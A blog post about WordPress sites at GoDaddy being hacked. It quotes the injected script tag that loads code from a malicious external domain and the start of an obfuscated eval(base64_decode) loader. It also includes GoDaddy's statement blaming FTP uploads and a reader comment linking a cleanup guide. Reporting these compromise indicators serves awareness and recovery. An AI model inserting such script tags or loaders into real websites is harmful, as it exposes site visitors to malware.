There is an undetermined number of sites hosted at GoDaddy Server that have been attacked and exploited and unfortuanely Mine is one among them. The scenario is the same as a few months ago: Malware is injected into the .php files(WordPress) on the hosted sites, and the visitors of a site are getting redirected to a third website which injects a virus into the visitors’ computer. (GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber )
All the sites we’ve seen so far contain the following javascript added to all PHP files:
<script src="https://myblindstudioinfoonline.com/ll.php"
Which are generated by a very long eval(base64_decode line:
eval(base64_decode("aWYoZnVuY3Rpb....
Now i had restored all my webpages back to normal. Now I really hate those hackers!
Wasted more than 5 hours in recovery itself!
If you’re on GoDaddy Server & hosted WordPress Website, a major malware infection is going around. Kindly check yours and get solved soon!
Related Readings and Observations
How my wordpress blog got attacked and restored How my wordpresss blog got attached and restored an awesome journey to care about web security. If you are a wordpress blog owner then it is a must to focus on security.- Interactive Charts – NSE Cash Realtime Charts We are proud to launch NSE Cash Market (Equities and Index) realtime charts with lots of technical indicators. Now one can track 1500+ nse equity charts on the go with greater control over […]
- Nifty Positional Shorts
Source:
www.marketcalls.in
- High Volume Scanner AFL code Scanning for High Volume Stocks is interest of everyone. But scanning stocks manually from the 1600 stocks is literally time consuming and it is one of the primary requirements of […]
- USDINR September Futures Positional update USDINR Futures turned to positional buy mode on the hourly charts with support coming around 66.59. Reverse your trade to positional shorts if the support breaks on closing basis.
- How to Become a Registered Investment Advisor in India The career of investment advisors comes with great demand. They are the professional that provides exclusive assistance to the clients when the main area of concern is related with the […]
An exploit affected PHP files on approximately 150 Go Daddy accounts Friday afternoon. Go Daddy’s Security Team worked quickly to clean and restore these websites, however, we have detected additional customer sites that may currently be experiencing difficulties due to this same attack.
Go Daddy’s Security Team has identified the cause. Our forensics have determined malicious files are being uploaded via FTP to customer websites. Go Daddy is asking all customers who believe they have a problem to change their FTP passwords.
Meantime, our team is working swiftly to restore all affected websites and appreciates customer feedback. Go Daddy will continue to monitor as long as it takes to ensure our customer accounts are clean.
If you suspect your site was impacted, please fill out our security submission form, located here -- http://www.godaddy.com/securityissue.
Thank you,
Todd Redfoot
Go Daddy Chief Information Security Officer
Hi Rajandran R,
I guess you could have used the steps given in this link…
http://hubpages.com/hub/Godaddy-Malware-Issue-Fixed
dont know how the hell they made this good tool, but it works for sure…
We surely need some more people like these… 🙂